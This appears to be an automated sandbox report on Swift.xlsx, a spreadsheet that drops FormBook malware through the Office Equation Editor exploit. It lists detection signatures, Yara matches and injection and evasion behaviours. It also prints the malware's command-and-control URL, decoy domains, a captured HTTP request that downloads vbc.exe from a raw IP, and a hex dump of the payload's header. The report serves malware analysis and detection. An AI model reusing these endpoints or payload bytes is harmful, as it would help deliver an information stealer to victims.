Windows Analysis Report Swift.xlsx

Overview

General Information

Sample Name: Swift.xlsx
Analysis ID: 502159
MD5: 9a43d5d2ffc56e823280ca84f6bb870f
SHA1: f0945075b44bc2cb2c96b168d47a269eb0d714ce
SHA256: 88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Contains functionality to detect sleep reduction / modifications
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Contains functionality to detect sandboxes (mouse cursor move detection)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 7.0.DpiScaling.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.DpiScaling.exe.72480000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: DpiScaling.exe
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 9_2_00409218
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 9_2_00405AA4

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onedrive.live.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 4x nop then pop ebx 7_2_72486ABE
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_0049D80C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 4x nop then xor eax, eax 9_2_0049FB94
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 4x nop then mov edx, eax 9_2_0049DED8
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.septemberstockevent200.com/ht08/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 15:05:26 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Wed, 13 Oct 2021 09:47:27 GMTETag: "f7c00-5ce38d98ee1b4"Accept-Ranges: bytesContent-Length: 1014784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 f0 09 00 00 88 05 00 00 00 00 00 2c ff 09 00 00 10 00 00 00 00 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 0f 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 0b 00 60 27 00 00 00 e0 0c 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 bc bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 8c ef 09 00 00 10 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 64 b2 01 00 00 00 0a 00 00 b4 01 00 00 f4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 0d 00 00 00 c0 0b 00 00 00 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 60 27 00 00 00 d0 0b 00 00 28 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0c 00 00 00 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0c 00 00 02 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc bf 00 00 00 20 0c 00 00 c0 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 ea 02 00 00 e0 0c 00 00 ea 02 00 00 92 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 00 00 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /008008/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.222.155Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp String found in binary or memory: http://java.w
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.687535121.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /008008/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.222.155Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to read the clipboard data
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0042C3D4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 9_2_0042C3D4
Contains functionality to record screenshots
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0042CA18 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 9_2_0042CA18
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00448008 GetKeyboardState, 9_2_00448008
Contains functionality for read data from the clipboard
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0043F6B0 OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire, 9_2_0043F6B0

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\Public\Libraries\hpvdsxZ.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Detected potential crypto function
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249BABE 7_2_7249BABE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72481030 7_2_72481030
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249C130 7_2_7249C130
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249C9A5 7_2_7249C9A5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72482FB0 7_2_72482FB0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72488C7B 7_2_72488C7B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249C4E6 7_2_7249C4E6
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72488C80 7_2_72488C80
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72482D87 7_2_72482D87
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72482D90 7_2_72482D90
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02641238 7_2_02641238
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0259E2E9 7_2_0259E2E9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A7353 7_2_025A7353
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025EA37B 7_2_025EA37B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A2305 7_2_025A2305
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025C63DB 7_2_025C63DB
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0259F3CF 7_2_0259F3CF
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025B905A 7_2_025B905A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A3040 7_2_025A3040
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025CD005 7_2_025CD005
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0259E0C6 7_2_0259E0C6
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02642622 7_2_02642622
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025AE6C1 7_2_025AE6C1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A4680 7_2_025A4680
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025D57C3 7_2_025D57C3
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025AC7BC 7_2_025AC7BC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0262579A 7_2_0262579A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025DD47D 7_2_025DD47D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025B1489 7_2_025B1489
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025D5485 7_2_025D5485
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025E6540 7_2_025E6540
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A351F 7_2_025A351F
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025BC5F0 7_2_025BC5F0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02653A83 7_2_02653A83
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025C7B00 7_2_025C7B00
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0259FBD7 7_2_0259FBD7
